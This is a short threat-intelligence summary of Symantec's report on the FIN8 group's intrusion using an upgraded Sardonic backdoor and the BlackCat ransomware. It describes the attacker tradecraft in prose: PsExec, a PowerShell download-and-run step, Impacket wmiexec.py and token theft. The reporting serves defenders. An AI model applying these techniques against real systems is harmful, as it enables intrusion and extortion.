FIN8 Bolsters its Arsenal with BlackCat and Updated Backdoor

Category: Threat Actor Activity | Industries: Chemical, Entertainment, Financial, Healthcare, Hospitality, Insurance, Retail, Technology | Source: Symantec

In a recent cyber incident tied to the FIN8 (aka Syssphinx) threat group, researchers from Symantec's Threat Hunter Team unveiled a sophisticated toolkit, showcasing an upgraded Sardonic backdoor and incorporating the BlackCat/AlphV (aka Noberus) ransomware encryptor. Previously, FIN8 had utilized the Ragnar Locker ransomware in their campaigns. Symantec highlights FIN8's ability to evolve and expand its capabilities, as they "initially specialized in point-of-sale (POS) attacks" before transitioning to ransomware attacks in recent years. This strategic shift reflects their pursuit of more lucrative profit-gaining opportunities. FIN8 has a history of targeting verticals associated with chemicals, entertainment, financial services, healthcare, hospitality, insurance, retail, and technology.

FIN8's latest capabilities came to light following an intrusion attributed to FIN8 dating back to December 2022, resulting in the attempted deployment of the BlackCat ransomware encryptor. Symantec first observed "the attackers connected with PsExec to execute the command "quser" to display the session details" and followed up with PowerShell invoke-expression utility to download and run their backdoor. The threat actors connected to their backdoor the following day and appear to have utilized the Impacket script, wmiexec.py. "One of the interesting features of the backdoor is related to interactive sessions, where the attacker runs cmd.exe or other interactive processes on the affected computer. Interestingly, the sample allows up to 10 such sessions to run simultaneously. In addition, when starting each individual process, the attacker may use a process token stolen from a specified process ID that is different for each session." The use of native tools and living-off-the-land binaries including PowerShell and WMI are preferred by the operators to ensure stealth. FIN8's intrusion has also typically been initiated by social engineering and phishing messages.